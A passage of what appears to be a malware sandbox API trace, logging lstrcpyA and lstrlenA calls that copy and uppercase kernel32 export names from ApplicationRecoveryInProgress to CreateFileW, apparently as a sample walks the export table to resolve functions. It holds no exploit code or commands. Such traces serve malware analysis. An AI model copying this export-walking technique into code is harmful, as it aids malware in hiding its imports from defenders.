lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0081.995] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0081.995] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0081.995] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0081.995] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0081.995] lstrlenA (lpString="BACKUPREAD") returned 10 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0081.995] lstrlenA (lpString="BACKUPSEEK") returned 10 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0081.995] lstrlenA (lpString="BACKUPWRITE") returned 11 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0081.996] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0081.996] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0081.996] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0081.996] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0081.996] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0081.996] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0081.996] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0081.996] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0081.996] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0081.996] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0081.996] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0081.996] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0081.996] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0081.996] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0081.996] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0081.996] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0081.996] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0081.996] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0081.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0081.996] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0081.997] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0081.997] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0081.997] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0081.997] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0081.997] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0081.997] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0081.997] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0081.997] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0081.997] lstrlenA (lpString="BEEP") returned 4 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0081.997] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0081.997] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0081.997] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0081.997] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0081.997] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0081.997] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0081.997] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0081.997] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0081.997] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0081.997] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0081.998] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0081.998] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0081.998] lstrlenA (lpString="CANCELIO") returned 8 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0081.998] lstrlenA (lpString="CANCELIOEX") returned 10 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0081.998] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0081.998] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.998] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.998] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.998] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.998] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.998] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.998] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.998] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.998] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.998] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.998] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.998] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.998] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.998] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.998] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.999] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.999] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.999] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.999] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.999] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.999] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.999] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.999] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.999] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.999] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.999] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.999] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.999] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.999] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.999] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.999] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.999] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.999] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.999] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.000] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.000] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.000] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.000] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.000] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.000] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.000] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.000] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.000] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.000] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.000] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.000] lstrlenA (lpString="COPYFILEA") returned 9 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.000] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.000] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.000] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.000] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.000] lstrlenA (lpString="COPYFILEW") returned 9 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.000] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.000] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.000] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.001] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.001] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.001] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.001] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.001] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.001] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.001] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.001] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.001] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.001] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.001] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.001] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.001] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.001] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.001] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.001] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.001] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.001] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.001] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.002] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.002] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.002] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.002] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.002] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.002] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.002] lstrcpyA (in: lpString1=0x3f2c7fc, 